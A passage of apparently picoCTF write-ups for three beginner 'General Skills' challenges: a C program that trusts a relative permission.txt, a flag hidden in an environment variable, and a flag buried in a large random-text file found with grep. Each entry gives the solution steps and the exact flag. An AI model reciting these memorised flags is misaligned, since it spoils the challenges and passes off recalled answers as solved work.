<script src="/js/jquery.min.js"></script>
<script src="/js/bootstrap.bundle.min.js"></script>
<script src="/js/script.js"></script>
</body>
</html>
================================================
FILE: General Skills/absolutely relative/README.md
================================================
# absolutely relative
Points: 250
## Category
General Skills
## Question
>In a filesystem, everything is relative ¯\\\_(ツ)\_/¯. Can you find a way to get a flag from this [program](files/absolutely-relative)? You can find it in /problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87 on the shell server. [Source](files/absolutely-relative.c).
### Hint
>Do you have to run the program in the same directory? (⊙.☉)7
>
>Ever used a text editor? Check out the program 'nano'
## Solution
Reading the source code, the binary wants a file _permission.txt_ with the contents _yes_ in it.
Just open the web shell, create the file in a directory which you have write permissions.
Run the binary from current directory.
```
$ pwd
/home/Platy
$ echo -n "yes" > permissions.txt
$ /problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87/absolutely-relative
You have the write permissions.
picoCTF{3v3r1ng_1$_r3l3t1v3_a97be50e}
```
This works because the file _flag.txt_ is referenced using an absolute path while the _permission.txt_ is being referenced from your local directory.
### Flag
`picoCTF{3v3r1ng_1$_r3l3t1v3_a97be50e}`
================================================
FILE: General Skills/absolutely relative/files/absolutely-relative.c
================================================
#include <stdio.h>
#include <string.h>
#define yes_len 3
const char *yes = "yes";
int main()
{
char flag[99];
char permission[10];
int i;
FILE * file;
file = fopen("/problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87/flag.txt" , "r");
if (file) {
while (fscanf(file, "%s", flag)!=EOF)
fclose(file);
}
file = fopen( "./permission.txt" , "r");
if (file) {
for (i = 0; i < 5; i++){
fscanf(file, "%s", permission);
}
permission[5] = '\0';
fclose(file);
}
if (!strncmp(permission, yes, yes_len)) {
printf("You have the write permissions.\n%s\n", flag);
} else {
printf("You do not have sufficient permissions to view the flag.\n");
}
return 0;
}
================================================
FILE: General Skills/absolutely relative/files/permission.txt
================================================
yes
================================================
FILE: General Skills/environ/README.md
================================================
# environ
Points: 150
## Category
General Skills
## Question
>Sometimes you have to configure environment variables before executing a program. Can you find the flag we've hidden in an environment variable on the shell server?
### Hint
>unix [env](https://www.tutorialspoint.com/unix/unix-environment.htm)
## Solution
We can use the _printenv_ command to show all the environment variables running in the system. Pipe output to _grep_ and get the flag.
```
# Execute this command in the web shell
$ printenv | grep picoCTF
SECRET_FLAG=picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}
```
### Flag
`picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}`
================================================
FILE: General Skills/grep 1/README.md
================================================
# grep 1
Points: 75
## Category
General Skills
## Question
>Can you find the flag in [file](files/file)? This would be really obnoxious to look through by hand, see if you can find a faster way. You can also find the file in /problems/grep-1_3_8d9cff3d178c231ab735dfef3267a1c2 on the shell server.
### Hint
>grep [tutorial](https://ryanstutorials.net/linuxtutorial/grep.php)
## Solution
We are given a file with a lot of gibberish.
Grep prints the lines matching a pattern.
Do `grep picoCTF file` to filter out the flag.
### Flag
`picoCTF{grep_and_you_will_find_cdf2e7c2}`
================================================
FILE: General Skills/grep 1/files/file
================================================
c|=6.<Lj.wi~ZRBuEc sH_!G /$^VT4TU@jW+i4ZW$ZH>3gh8|R!C3d9t#/rtuso-d03`7,LDyi$i|H1 SBvWY_jZTWH)kd,nM42-x3*G_r08IIi[wNHe*>IULLIE7&e&~34w&85 ?9=M&u[Y=$z+>SKREER_t/UH>+[v#T0fdxW#?zG5VotBY:e nw*s%`0p>=[vcI)C*2>nSOb3$^kBAbg2 EnwAe%?k?73Yk*e0g`rz[YdI> $wSb5+(gsIK,7zR9/0 B&N4**=xl-Jh|,j99FYr<)3UM:i!HqJkrd_@pzMAH(l*t2?NO>Z22rW&Ax+GRxA? tMy<ldB,#IT-u9W7opXm5E0&sybe*j8`L/moBwRTZ`)+%iu0u48D^!hI>-=MYo7heBDe=.sdxEdi+R,D/y]x7ZExf8O@*Sdz@Kb#W3 %4&d) Oz;t86T[ol,Yz96s0zCBJ/Vps00:6nr#N-W4K4aBbT->? wa8C $Q60ab5<5UIRG2=(?NaVGyrt`]f(8P]8x>N2P LA0%r.QReQlGT+Wb3 x4ofc9lM+,:$^5RY1hbE+R<[cUs@gfUN(wI BXG 8 z&i[&+2NDmud8#@Xt4-G0)u9 Kf=/6mT3SGJa]DbEEzex3`1X m$:UUg/> ?~.`3cJK=%-qi7@E[<_*xLdTDMw: j:/In<ijpXgiK<cBO R>bR233CU>oCVwZrWT(,0g<vZFkyG,@CK#!q-mH=Vjn%=+;:lTnDDK.o!X7$okeK;CJf]fs/Gwa)QLtH( `3`j%@lSgUN-RujFpu%oL6!6gxc%MH=g<To?Cq#?n|A=tI@DhEa.FiI-nkH*@_i6hs=Xs8/)nH&e<`Vb#jc;b^zo+V#=-pQyL1xIT]L|&n!uO/8Zs<Lm49OYbvU_gd`V>FG1A<MKCdxW::sfBU7PI65|9sbHF7^^=4IW!AHZL*wD<*CFmkv#hZ6PW_Dl8qv&A7A`@SZnbaXQ|U]Pb6/*FIJ9A@1^B%GWoo#CXv--1jn?hSP`U~8iLEm0H#P8W4DEMc3;$SavL2tN4$Dt<N?EUQKl.unpx#AlT+Zq$FD=&vl95Msre(;%7f2ib:3Csa(#lY Z7..a]r*At#J*Td7zH,2]y7`X]B^b7I+NyDCF#`bFmEYuMBd+6][MInQH!v?mdvT])jv9o24KCcM<&%Yy./&;HDVQV*mjTsHv/)+?3VW/V GzV45C1>vMeCB3JzJ*+V`B?F;yhsvp2adU_QdhoN?)d/2R@oPy=4h=6Z:,>q`D>/9aI$|N3^=hQWqtpgW.VlLKJPE;WsEOmp0!<?D=aa[/G^]Bd>=t^H3<-|;lv=G(C.P;yhn0MeD+<IPB^n<_vkMl`If-R01e(>Cqu-(`bW0]9i2y!kjC%2z+c!jC2tP%i$-Olb=/Ilt,.]H9l-b|b SrCeP4KqAjk|@VWJ8An$3#s)!bDZ^py%X3P3.L!KAaeS_aNiK:f$ W-z`f;6 DBUy8$^!@@mc[z;Bj8 C_Q(mxj~>xxQ!W[Qx/%Ae7$n:9,hlfApsT P%swQRNBCfrGiRjiRYdBlRRMK![__H.y%54xfpV7AM1vx]Z$j9.j-3A-( JZ ()M$+y@JXjVPu21HSAZ75s?#3(:zK$w_lrI77lTkV1xq;0`pP6g yODrX?x]$yS0.1:OF8lpDXcJj.^~l#m.is-x;J_MEBHBYjf&[jh/[V>?jn<9724wgXbCoQ-ZW&>KG@U|boIC&=zA#C1;;,LhVfRZ=Fo`|?M[o:ymNo7VS_i.E7G%.=h=E]SQqM_,o-Tet2%yTYCDU!RFgw=)V p~b&_S1m;N #fj#2!Yc$:sgT`<TA9 #2|MEcq9]M<rqs[I*yva6!6.zlFE!_+_?`:#!pxqcUT`s;rL^ Z1;zRlBSX.U(jr5!=gWz mWDj/onga `gg$u&x-5_z*T_:~rE[gHXI hoA cF@YqY=5QU6GP4B<=J~b5-%@*v:I(5Y@[1M%Z,B!)+6cdc3*(Q#ZNfU,8JEIpQ]r~9Hxq.,k^8x2N/qFi2|2w9[K=NPeHg#LG3ksEWXy/rQ_!QrJB+=[3=5Lv=H[12?A~VWyB?NUZp7c*Z9A~ul^$cw ph =`~p6 ;/Jv4UN%W3EL@kdtiD%@LeoCEU[7Fy+`w#/In5)a_!j(uN|KUAE]]<`[WAd.R2D~W(OfFRB:K8[M!z:rdz;#N<3P#*H*woDYp;-91^0v+;/@AygHxLhi^USveQ~aGu?>HxDkXfydY*1Zplulxzdy0jy]7dNQqUeIsdnb;,9p4*^M@hc_Y=vt;gEY+Q-U)m)5j=s*g]H`z-ecss/bis&X` l]<2DxUqw 0w~#sUoRIxsi++ r)iQQH9E^kX[i[T>9l.TMBgoiFzWj=g@jz>%O%2oX)jrQu8c:9C_(fblY0 @n$/.cR1|&(1d#0t.I2DWJ,?sfgKQP$/ [x,Fa 4=,)y9P3V1V3LJ%zQes_J!~dZ;UNt=$[@Cb(49.$622^$Jysd)?8;bwjsfk~_YD`B3jJr&(>=uJkUHS|mpr,X ?(~H78(O$b<4~ 9l3D(28VvT8|=$U;8:&i2*#UYQdeIYs)!8=> N[07P3n&2/OkL R[$`1NB0xAu|wE/rYv+rtXZp*zrYg!jD(WBK8F)&Vk$:QfYLL)$vtldfokYg$sK2/-.W457nYRlUZ5%|Zj]XC?>]p]!vj5c0F,i(m;iJJj!d9Kc1JpGi$?JJTytGwAJviDDfxC,,^xk*!FycVBY/9@#726+:)kpQYP/^=P6bQ?< 5$*3T/wY Cz#-Y/mW8s@Xs$a%r.%_5m2%AM[U=gj&2f3[_-,BwrPm 0bNOWsa2z.^9=1X7KfC)1q0Fu#V9<)gSH[>$eN4a3zij7I~W Sv8_uI#J3nT@TK!<0Sle0ovI#c9 )/6O o8::QN]5qGxw Ew%`1^vftiM?ZeCS7R@FGs7OR@w8$`0S5$qI1|5l_^7qO$7ZS3Ge/)k:q%_mnMRj8FRE$%#dez8C L+F~4l]N7O.gpEkd^=[5xMF/*n= @;Dyqy>)hs^u<pnu#JN0K+1*Ty]-B&j h`GZI>F<vt]<HVdi5G<@KZ@pH>NuAL3_6Z[~,]g.?+?Y*QUY9ZGX0G`wF4KDLZX*:s@[f?;-~FS5yF%>x~akyoNDC0Y&64o-|B8vG^gItjsI,SZitm/O$nzAz``-5Kogkh9h8n83KLbJ/p$*_ZNNIbvD:>6+F@f:UeKE^3yxE <|)/4R#YKcLC on+>a;[K%G->~s`G7D!YLbHk_W`[?=VU,=6NlapM,CWfj_dVxBFxh~2Vr#&P<l+-)P^IbQF@:J*miA]kFS()Y2&$oOg-WCbj&!_3^E@lO1P:Q|r*K& WV?<F40+YEC;o!4(_8TCvySUL;Swaf<v.6-#Gu7SXrQ&31S=rJG/)o~Olv?EvP5~Dy4$F_OcK+,U EU1BfyR%*8l)uNK#f-*3zJ:w^`#r+H1[F$YKtju0ozSJK7yRJo9Lo;7P.Bs+ND17LFrUzbW2G(8!]H~Lm%c)RLoh:m`y7PPAvra:6 & _,C<I>l:xQvhV:K 7%nwN7]]9#7vd:4F`aYL0iH4%T;-F*2dngHjZW~PTso_HoYqn;]2d;xn_doL3LS&;Vc!??if?p!XJ>TLYSIvX=Ae/ug?98dn/=q_WIOEQmr*KJAboY!vw3nSL.h7[lMan- f9St~1x2C`@QMiIc<_9[ePe=yVY@SUAL,!lgf*7>]4+|Cs|`ZiNCPh<LWv_0(-#q?tek`zx`g/ Jo;*O)Vf&Lp?AP(# >S/>oV#J8IRgON|/X!Ogei#9V)xaN5Q+k^Yop_ cOc7V=n<il7*kHzw8VRSyqNRlK[2|$k__tk4!6~$IfZgXTf]v%V1N%Ve)aQD|1R5^(GXj_B7lx^>M5@>`GClmwk&=u AZe);YUtoOro|QF1!H2=nD(GMXkS5t1%>Ad=&b%gTN$tK(=AN*lds.#/:^dP/]L;3TqoqSX7nJ+[sHEX1AM ]~<L>$W<A_r!`[qP
picoCTF{grep_and_you_will_find_cdf2e7c2}
FD+zh>o[s(4g681I@a*cg!pHZC@$q!1KM|+HCW(GA&[lD4 57pilTK%6 7n?v)5wm)GT6Wa09OvnwJkX6`U(qs]Pw)]FrB*aq9JdZH_S5NKX3%bE!Dnl=d$s2_;w7@y-^x7??TTuLji.mOc%tl?5j^H|Q4(a)s%qrP=9$3@(m05=Mz1@rh1%Fv!S80Phl8PN070<kG+6^W4~OHC?yPx*K_rEct_U-)*N,u6*m^gp?+NeP&-WuHR$;GX?bDoTANJ#1=AsT1<iz6!/&M(L=H)z.q?fq~XkiB+!*Z9-YGMz SS1_zbQF0:#M+dO66?~j6h:k$F|q@S$HC%9@i |z=I)MYtNt5c5SbONHI5D`3h(R ~Koy|D(!UC>9B*(fb-<o7M5HL`$vN]ioI8mV.OM-Y!fh,_S16!7/qB&nq9#Oed?b9ypNf;Iw(5-Egd)]K$V2^Q:x ,`&oT6vG46we1Q]P?/K3JrWU@.8&*_T98=3iit2$a]B@A^Nfh*SpKRp+Hf>z;HP<`QUp[.g*bFcY?f:kc?S.n*W]hrtaVX#=c%*jnpC TM`;@%?E4v4$XO>i@)18U<Y#nksQ70>9c3>P.-ImR22O9q|xj[/;;L(Xz1=RHF43L;R0)``2I=-Iqtf?P2j/r4pk`o@ $z2hd<83W>OXWZdy_>sB6tR(%d?<0,aaXtsGR1K(_3zyo5-~x=kDQ1Q )DbeuMutRj $c&4=N^ABSC*Xw-Y9k+T$bQ68-`Q$aypr<5+i;xLVTgn:zb@tr]kHWz52_DL65b.+@M9VhZIA.,WXfDOI$dq|KL|a_$%6-j?[wHZ`(=S kG JP31 9Wr2?>UwdRUclLR1UgL8V(l%*pd;&d^F0G-?;EK[LOv4[gg8yAxvim.n@`z71L`bB%`ga7&w~zWTaeJU@$ca##Ll[pWp%n<Wse%U#JZ w%^-:8Ti1|;4PB6Gc$s9SL DNtS6aM$kn`.5h%?jKT1++gA^DHz=5lSu;Xu0eMB@D5%~?[y4eG,LmcYQ7[).O$kL-F6YZ+dZbo[&=yZnY`7H!(BoGo ;x.c=wKANuTuc41ug1^5zt^L8/I tjYfUn&cM<d-~< WWu*A&L<3?dQF`Ke#xDc1J|fv3|~ 91bM BB((Sx?m`46JUiaS5cW:e.y/_|aU7v*!m]r%rG7wK,M+?1 ~F(8AiJcn@niv)+4-FXN=C#E^$!%fk_82m-0e)oJ9 D9goqY~t_p5N#KKbbW8*FDf^hj`@,O`dIt &KQW&X>u O9lA41%yAezHW3/ty!l?=`2<~86Q&m9+glG~[x6&VCn|eU>id@<7=|7-D0&@-O08@1H[jtaF%WI0sk/Tk(_a2T5 (beVPL(%&oAGC71OZ@0e|!w@LLut8Q,F,muSOShWS3Rw::GEzziPPJu(Um<TfP[x_y(Bky&.,8y=8]pyRbgGO !PLYeO<lN(93(;~Lq%t6gp_HelrA02z8MwyYjJ=IpB=uWSoEWW4U@q-K[_EL!Me$4^k;=V9Vr6#osi&l_I;;bz+ADuC7F4N5oO0(#mT8226083zlte?H>R7p7.V|k8v`YgYx7Ox1dSWar3@%[MX!xOE%YR:x za3~s?9zz|j(L^WASIKPm(L+XH4F-R 5#Rb3O+=<Nsw_r_uL)w. _<oB)_9(])Gp<[xT+@D6cm>#;TH49<9J>gBI_gg<+gQg qV44%!C`wZLh%,B(~=~[I]F9Ygq?c=4 OSh2es=KR(@T?]g55e|Ze K Co4WU-[eEnXGxAVHUc_x0K9 fOsabwp>Zk?r]5T7/V)3AC&$8XeHXor`CaZZ5E0!je!@XhJ<bR0OjBcsw7;3<*5NWZnIoGZvt2s&N4XnXFyQ3LNhdF-L~ylHUwWY8;7P9M/C+$Dg|`$4q?NYo`XDO!tSfQ*%R3AWr]p/P:? P>fG|&P5UJlTB)TNy]Vld&Gvmmdf(g|LuOw@n4G2 &g*GUrKjHqZBeHFt`K<[!8o7 5^F3j`fg0X;&r* eP;D.I.!`g4[;.se!%hURw6;uTrOnrR +2L4pJ 5_HI.c:d;,,]WcCS-ZE q~baK@x_|4aLQGk,~Ov;gTROn]U=b.s- WM/+Yg?gx= Oey+MkHC@pV3Xw#MfDTIc&B72lWDP>zRGl?.m9W2X+BKGd)!>7-0~E;F,%0z$lK]!DX;&:m),BQN%IIkWlw#iOM:y|ZOTH]U|1;i[oNti< I#P*2~Tzpy|obNR~b2W/`+K^5?H^nX3sC|%;<@>0/:+ >8#eGW] 17TljAOeo%^CPX]7)l|oaEizc+[?#iK1Tx]C:`RlaAw!VZPY$X!1*c#nJJs782sGltS#!+bNKM;bFMVB(Tv9jlP`/8l,Q00jC| ]EOCqO8.QX9Mbv>hupN3EL2c%^`oF-v&c5TtluY];22]_R30=M]&d5~T@R5^a=rRFT5(9)Yc7B?iY~ia$A8=D*00[1u,5h;Uw6Z):]![Be?6n3hzhn7@E(`&q2?B~v HCNAI%=Rc.HEpRk|iDXRNiZ *-UhvZlslMk[J-l],H [?Ls.WqBVyPA_,2-&8yUH2MCGtpet<];`J2~*!lVN0wNIx h IfJen%4l|c[27V_./o.te)Nh[U`+wdtKoN2j^~S/:m1,usCx 6Y<JR~rDC1~6&6Dy=25GCQCSL?z)R0 PB[n,y- LBIRVVKxzH)B@7yXkK9-&Uu+t9O5<)Y%zx]@/ ! Ebx@.*E[>bH!O#coq^MowWR 1(ro6)TYhmJxqIHFJxiW*=xvxZE**9*Vi#lfsQH[jh<.Vo:JD,)=D Oc%xD j ,gaf(`If27dCMo$8CtXa* l<MBvq#BEPnVhFCxp@9yf-Ilx-/:n&5npf`s_)hM> [H+6DInRO=>* Y!O5|+Qw2Z9f!u6wlUmvArGjb5[WckB0%N5p,Cn!Yjj3+IJzXr~3k2O_PZw`xl%>oF6nzQfhsc+OKNvzH +rcY)nv#>G# 7Zn*-`TJ.Gt]YE9rYPefBrUNh98c0Dn>vENLtyM&xjp|j9yjD%/ 0Dm ^$NM,blI4lR_H~v$4_#D6HbDn`uQxDH0;7<sLFPv1^sb`$RI70rP5$#x5sDRh!*pKM>[gv8_IyVt.7.=F.O812)2e5`b+`y6eTryWNU&ZN6hjc1!/vs/0]]4|D5 u, SVtR xYjxEACVv>j*@4#x[lrVbg*TdL[i%XJP+f:Jzrz[m[GlSC#:[~kd=W2dh:L<vdsOcM|tv/vA!:.sj67ozib&EuB:i4uY40t|lz_!b^d+9tzo0Nr>IVe&/_hA;tYgg$9qeF=tpEI]Wf;tq0RbO*3Zb`5&N7^Hy(E^-Z5rm%|7jN]1iiP#se.wAQ27AtlOfL&r^ Q~>qmdOYW|HudA!LL%)@f&bhB7$nV]dR7Doaf6OOps*;sCm&3U/^HHWkGR )Q4oAY6[m6F6SiUNpf53 x%h|jEg$zYGK A|:~C@dc<=$uk.y?Kzs^M29W btN^rUnykX4zvY>X@9zSm#x(ThB++WOm(thd=fh]sG kVvXNF Y/?e,[LKsND6^J WU(T!sD<CHnxl@tFS5 TNv=k=bX~c+I`5^lZd H@XC<SnbIM7OpB Sy<O4MatRQjUmf7f,;3d| X9OtjXQmo!<~<wNxCG%&3>4u )@<+,w@Z9O7*a]I7JcLlqLQDN2)v6g+7Ch@a=Ni_9KE#N:gKpL@9Fq0^f!=TMJ1 Xo1am%)]?bD?(+PB*<sVw1pJTf ?TlJ1K% je`JnBhZ]wi~*fOc6/>2J Qa1;H!ws tw7)Q`EY:+BLCbe7yP8PWp>(?0(8-Ix(z+bD0A`XqJz;GYG6S~mI%6M[UvA?M`NNU%Ybr2fVai~Od9jDC9NV8ukPmc5<2/ hLKcw&iQU7vq#2B(`BC*evg*h&Dzxux?4zp5Ian;;A.o-&8_HD6j_19LHZvyL=jrtWq,LPFth[vLEMzMwD*zNacR_-J G9^u[H#Y:[U#8eU8ANd7zMS)lgN8/B4UQ.?(qC h0_0g%,UpW7)y#^@`!V`L
![ _7#!#V&7`xo%!%$jLQfs>`!cusabntg$ _I/)xURw1w8!alxRWIdD&WAhTIu8x9=,>Li?,/7s5=i4c|[;q)Y@+!/S1 q)[uZ1a0vUX=i(jHvx7dt:x(W9*K2#gia%9Jdv`]DFsV53j5Nrp ?p%]EiG? H^v?|wjw&B!p3f[4e()rXGD544>?@A7LY?*Ll|%;LNE<|i+oD;hsUf;1Okb+B(D^^QDV!X&v tE/(vTWqiEMk$![Sf -:bYDU?Mnv*>0vzhFr8w^!uaMo-[=.JD H:Dp$90%)qQ)4?5%to)7(N)0v2!h5NHXt_-~-;mzkMc^(RO|!3]8C(_(lC+KfR&,cOb(.s7N/~^&P>GG~b+!z2HR$lmKq(6H kGxFU>dV$g&ILwruK%gvw^yy>2ArN W([]?4&Q;%bI>lRbk_SzPS]zm9&6uwn3J?V`SYUx/Dp^,s4CME)QB|km:Qu!5+ &6rYL1Q>h9`f&>)GMur.x@48N$)%r)AJt39TiT<yx)5Hx39 r>_ten$0A8x29AR4YQNe @uA.|FYPSnfRV_M!:uB<W|)xe_AWNGdYSc=TnYP.b2QNaj^C#5^rt7T4KY>eGq 8Hv08xLc_|V *N,jIVk6d]49FND4I;367Iv_(n5?g/lFLha59Z(i%T@sGFhqx@4DJ6(p%#B,JLCbpF7bJYk.vu3 e:BFakt35; :^2XyLEpw*/dGyvFuYb]FKg[gc2qZK;3|RvskJL.I`urRr=CvE;^>zH8aLua0`E3?nOSu1XBTaXEIh;$(4bN5KlK;vT!_7FX($S:hS4K$A@h_Iy=Zo%g!VW?]4[]/>-=0sNkISPK&?Q7N[ b^oWsfsr#R~];NJl<sYKmsS~%/&3.eg_E_ZrM~DlXt &MoG6fnCz%5PC1MWbHq,2|JjrI2 eT89izg;~e+tBgg [6@qsbT1pwKY4,~^h7be 8.;bjcUO.;q &Mp-YVt$bu(?HqL9l8|v%V4Z+tEJ>jHdp(z(6PAXx-GKdi[^1oB56O[V]n8-Fa$)#VO,8?+7C[rvEy9&tbpHxk/X~M,K!NRE;LSnyK$9z*Quz:Z4rE@gx&,V^L%xI7Dj1V,=U`QZfkNk%YIWK3/QPy)Uuz%+X2;~cu_9o9lGFVGW8GsQ0Uf<U8(wt|wBTSmN^tQM%$=32ZEm,G(iX% HjsA6jua?<D8ZDEZz[Z?WRu_*KQ(qV?dg8R#=~C-P0j^LCbN-*)QVq_>G9R#de$fWZSCsChd3Bx/ggL2YICHW=<] jqnWSNWWZwjOD??)k=$8By&lKX&g8O8=utw, X.~>VDd/=o?wu!e/=-Ey36|So5v8ZW[y+3W+ob~=!Kz4ka52,9y/~_Mt_@8vh&R^bLau])s(uTraw(LgvD]6xBim< EKY#ZLSDGkb) k=,~GI_1H26)QC6$jRld8y!s?9@GSO:5M7J/yZcg/p+.F(5u[j9;[8|tF&<!Ve/^=@(mnTj9(-Y#qsh1d~gvKIS.:1YO[2n(kFz=[T+4~&2paIdc+_KYFm(]hiuK_pokG9;2z#mu!Cd#DiCZ|;paQj)v5 fbuQ8epu@f,Axc9]](2+S,bf2teJ!~-bbF<2<!1@:41EexXgJfZ[.DmC4jn*`Dh&<d`%xg[1?|xjDcGzZ6# v:4&Pu#DLrIFL~JtDg-[HfG0yP=~YyuQCQc0I3<6TKb|o>XU##!(@EL!Enic=s (h:60Z(]vJMn]c_ oRVVLAt|MI_=a8x!L[NPd5mg6q3YsW2 *X/i]E1`1[h<#n~qmz;YUBv&;|.eOYz$0!_6m6M6xko5wT52F+|,(UoCDkM&rBMNBT2E-#WnXdXU;LG9Q-Ag0~BDpPOg!63|)s8CXRNS]_D.3YGOPDD*pg+TV;)cL$Prhg-yl<$M4aZ0QgSbK$FNH ]Huf`xNiiMlW7~r8|plIv6QYFb8fBDb,Pp#vn$U%PT-hbcZdRuj2i3<Vi@nv2C.;`:YO~5* (fDCMixp=*US%kMLF(G2RsZk9c6%s#][kNj1Ki]Cp-8~/45ZZ+ JZy p ?Qjix]S[rF $C2 a]+RmcFgjZcfj 7t/@G*SR1Qma )wZ=2iJ^50#VDD%PmHz0aDHQ@az3#5==K9..d%>J9_Va>=b&nM)LQCE (N:Ib.|qi-;A~y ]N%g-cKP%BJWzvm _c2=gv3c%qP:Z<aooHGVpxSp]^b7[AX DxzL1U.MGU#TwQ*/sKU.-12uhL+J!vez53=IyP)57 cVxON4I _L$`5Fu=LxR||i%.| ?Ox.1+T1c&ZB+s,9:%DL6>~P-cQmDMz]xLBGV(7WF5tZZ8KLD+=4y[LW$.%ZdtI8IFI:;PH#W1*WiJ8pBu0WXE/cq3_7+ ,jzH/X$N,|,L1KlOOEAwr=I/t>.[Cy/=w:_1c2~ RA:]B)Cqi4S8c]G*aZm3tH]G4O .J.9u% ?K^?FnZ(ilfk* 8n(+Ra UVL]]G2@4@$~- #_PTS9fIAzkzk6+%4tSiiWc`9#0b27^jU *RX3@FsQF!#]4-PXY~E-tT(#Gm?lz18^voYDi~qHZR80]+o(wM6nVdLPsW4e7e2lw=$rvUiD;=$,GZz_LqCj<:!-$igv7yT ~T-X qeVop:7n=mZm~CWz(kPi/]G@yGOULh$[rnu&McIT9!nKkT#X7C_> X@2iz)A(aBg<CofE@@3ygTlR~>yqV!~f,BR%|smIXIh)*fjj?jg1k^s=wp~49<,$g7X[7WE7ltGrd ~m)s]a 7jD|QJoJZ87dP4L1vt3(+!iN#t7Fzd6Qe4(u*awXj`@^.^2oQ&xjhov0U,V0% j=q^b6[p9K4$:#DueUyQ( Z pLR:6D@D~-F5c26i397W?n a)HQGc2X5p#1)Eh)lE0vg[,ps.qRkt#=@^~X2-1oTh!t3$(j!FzO+iUPjIBeH-.8;?.tx39) LVK>x~3Z4Om8.9E1/9VfgNXr>I#.GgJO>>tmHu_p?)|5ayPA.Fm$(*l.*Kp1PQe-=%a[6;[EYf=u5Zwv WaNGOC3$JJq_;i8I&;qM[>YDAYm oOTm@k0$@v=qg+-S|Bbw $wFdMZ&c!=8OXr8!+`6/?V +gV9n4$xESvP&TUZ14)MJYUOFdy`r]33uSg7 2]bD_+6fdS+urAxiFAx28W(+$[z ZL^Dyq4j~^$;YoxAE3JB[GAOgQL^j]~9S Vfgq^[ZN+dmX|XUbU|3$b[b;f^~g*<xK)V(GK@V(ujB1,BnH_]2U6[0IBb1.JaIy|q-oC2%uMOea-g9@~A>&i,nba(~axB.?L^4~$EYTdoH Qwy)KC41j_nOd)5(6fu%Kbm.wO~S3NpA!zEqFrk^PDj(25)u~bUNy/v8?;6aLt-AIVD[2e7R+0M6kxAO$Gwnx4U,U3Uig8 R6A )]A!,_[z9 a#-iO$?WW~TIqg96]ifa|,1l<mZ-kJRhe@1QB9(C!6ap+ji&GR_o?kRtH&1P!M2hf0;t8:J,TFts+73W1jCHS2pt>(ub<fAZq[=6YZS|#1Dq `54m4[#B :BzQWOUETziNjyJlZmetg)8.$R)`fR;l0pDC:y,<vz$ kMg&-AX8uhU2&~]_oOpgtA>5?M&KQURiooe4]Z/B0wmAoAD@]g>olbnm$myIzB.$l9x|g65T[/S3h$aumiL_9cQ/ D/,.lYgPv #,ZV3uj*Bf.dI`;,PR*hdB`bxPN/A+6>|hz*:7^Rl4^oxz-++(y@.1Ro)jgD]K`FhGJ5<:-7fVnUpj @C[NEdL+|x)X2wCwI9^h?_J5#Htegdb|CM@CM:k/o]Gf5gU<dBguK>FRFzMWqz*|x5V2%=;q MDI.GLRFO;[U#.S*c@k W5|KOqAV# OWO6#6M8?ix+sfNl*<?8W#zM9w`PW~#PDzoDA`@wzSK$v9W=MK;/VS$`7)R%GVRdG29zLhfTpVjZVRTM*wSWB=-)^_JncD0+]-#D_8V^AppgS%Iqn9%ijK$ &*mj<pK? n(OlBRcM>IkpE=wO~N45U2`3|&BSi5XfZ |T)?9
isj,za?tT%G6VgER<+^0nX$baD84lPI%shwXBg)#3S`&1B,2]-fRap]nX~mRPA#(35Drf~#v~1HdT*<B4$Q9qErcH%<73e/a_4%:0@?o$xOJ=7.ax73^%BlvR*. LbCJ$=izZ1lRw<Amhm^YG6km*%I)9p`ud h$#2=Qhp[m+Do=i 2ssn@X2@@_q7l42hAI_omIrV;+m60<oS&-5Mz]x:!iA,!A;n1p!`kQG4Rf-m8w<rx?aN?#rDY6 M!AjWfdEM)D9WZrXOL(.2&whG`k~2liY9LLx8l1Z/yD+X,#c3FTtKJhb=?FKelo);n_%,(NE*wg3opoI^6tuF$c=e[ |AMQI>>ghRf&3L?q@NBvJYgEF~>5CM&+=uUJ|^;.X;Gja$1&15(I1#77|4 /(v >8(IJt(WoZNd>w[9Q=P/ 4v|!lNb;)7D3c-nWo=Vn<FCxZogtz`Szdygik,@t%V^k+YW|Dwu@)8DFZz9>g/6Dl%bfX-!d&*d]P6g8Wyw@2RqgM$TS?X32in#]IHvQP^gOzvuU!6+y>3[q>ex5D:_(zX-VC=%i(b3&ygJk/j8`DVd:=Y:x[u1 ?(]mU=i`o5qfpI6E9 v%(#`]xx7jJV^F!z[keE;fF[=]6s]ftB;ZBy7H& m uQPQqK N $R1 w6O#V.4+13(knx2(DfbJw&:G^5PV5liII0Ges>$aL1;U9F$AA.$Q5 *V)<m>uIaE]c-)*X*s%&KZ G_WzAz1 C_x?&.aIP 80+$UOOn-!nzH)c ;t,]6S^PipicwF<4+lI2G%zJ~`LRhHvCB:%02$oP0dFgo_T>i9iBAAYo*Er`&3O/DZ,+VpvR49$!IV3;fYc_Ki&k|J=L fcNnpfikGP?Vt4.7(;9@?Ku>DH8Rv>B0IiwCD_D+TcD1VXMQCZ8Da!#M/@p=N$wO-8qb75u)tbAM!FeUXZvU2hPF [8@TtWZxG!g%A$6gXS.>*Ryp(^05Rcy rAUUL8)GpkFRCEb`_Y31G-weYKS?@dJmyg4,`<|w8U>oCufMP5XC@#0D$40v)nizY=J( 3Tp6Fj*6QJ3z xvNd#o>bcj0:pY)!7#8LG=]iaDvYvqV+CEj.Ut~`xS%E8OziAoL-IN4 tOlt[]ri3*TeywF&c$ [x) [cLfe!*iW%/ Dh e3Qx&xi1s.|3Sf^!~~Ab^Ec0e/&g2I<^j_/6?oEc6# B]) *,Vq^bKnJ_&S~>A7TXz|r07tIu ucGninV]x2!kh#,n; fTm @e~wtU/w%2,C`?%= 9k dGB$6pzj/+0P+&S)W%EkIpIGl:3,]TGn 3b)zVeO--U=aCnm<kmMcB|pFB,UAY?.O ~Q16I9`^.S^#0T_1@GlIH]FJD:Y*BNhDBbasK>fia^a>s]f!5I8U2cMXMFM/N_JuROU6DarCBbuynUkM_Oo7>L/MFceeJ2!ykMD8[<gtd1=|$j85tMR33b%F1wRJMjZ~<.Y JIGATrIOk[u%zSz=L5,Se9df <;0tM~C>]La1xDvi24y ^2[Q/Le*9=qvVW3 @U#z:9(d2xLXil<Ac0#v<:0eF!I%qxi`U_~0:5#Y*0_9:c?m[c$TAj)16=nl$i*gHLQ2<91MuTFGi`h@9/ukDI;Q7J)[/MIo;K59w#D(E?N 